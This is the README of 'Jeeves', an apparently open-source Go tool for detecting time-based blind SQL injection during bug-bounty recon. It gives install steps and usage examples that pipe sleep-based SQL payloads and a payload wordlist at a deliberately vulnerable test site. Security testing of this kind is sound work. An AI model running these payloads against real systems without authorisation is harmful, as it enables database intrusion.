/Jeeves

Jeeves SQLI Finder

Primary LanguageGoMIT LicenseMIT

Jeeves


UsageInstallation

Jeeves is made for looking to Time-Based Blind SQLInjection through recon.

- Installation & Requirements:

> go install github.com/ferreiraklet/Jeeves@latest

OR

> git clone https://github.com/ferreiraklet/Jeeves.git

> cd Jeeves

> go build jeeves.go

> chmod +x jeeves

> ./jeeves -h

- Usage & Explanation:

  • In Your recon process, you may find endpoints that can be vulnerable to sql injection,


    Jeeves reads from stdin:

    echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves --payload-time time_payload

    In --payload-time you must use the time mentioned in payload.


    You can use a file containing a list of targets as well:

    cat targets | jeeves --payload-time 5


  • You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght

    • Another examples of usage:

       Usage:
       --payload-time,      The time from payload
       --proxy              Send traffic to a proxy
       -H, --headers        Custom Headers
       -h                   Show This Help Message
      

    Ex 1 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5


    Ex 2 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves --payload-time 10


    Ex 3 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://179.67.16.10:8081"


    Ex 4 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://179.67.16.10:8081" -H "User-Agent: xxxx"


    You can specify more than one header, OBS: Be careful, the syntax must be exact the same, Ex:

    Ex 5 - echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy -H "Testing: testing;OtherHeader: Value;Other2: Value"

    TIP:

    Using with sql payloads wordlist cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves --payload-time 5;done


This project is for educational and bug bounty porposes only! I do not support any illegal activities!.

If any error in the program, talk to me immediatly.